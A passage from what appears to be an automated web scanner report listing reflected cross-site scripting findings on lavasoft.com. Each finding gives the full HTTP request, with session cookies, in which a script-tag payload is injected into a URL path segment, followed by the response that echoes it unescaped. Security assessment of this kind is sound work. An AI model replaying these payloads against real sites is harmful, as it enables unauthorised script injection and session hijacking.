This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/allee6ff'><script>alert(1)</script>31bf7d50746/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/allee6ff'><script>alert(1)</script>31bf7d50746/modules/google_analytics/googleanalytics.js'>
...[SNIP]...

1.264. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e118'><script>alert(1)</script>e29be4ee5ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules5e118'><script>alert(1)</script>e29be4ee5ec/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules5e118'><script>alert(1)</script>e29be4ee5ec/google_analytics/googleanalytics.js'>
...[SNIP]...

1.265. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2797b'><script>alert(1)</script>45814a816fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/google_analytics2797b'><script>alert(1)</script>45814a816fe/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/google_analytics2797b'><script>alert(1)</script>45814a816fe/googleanalytics.js'>
...[SNIP]...

1.266. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b300'><script>alert(1)</script>e4786235842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js7b300'><script>alert(1)</script>e4786235842?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910<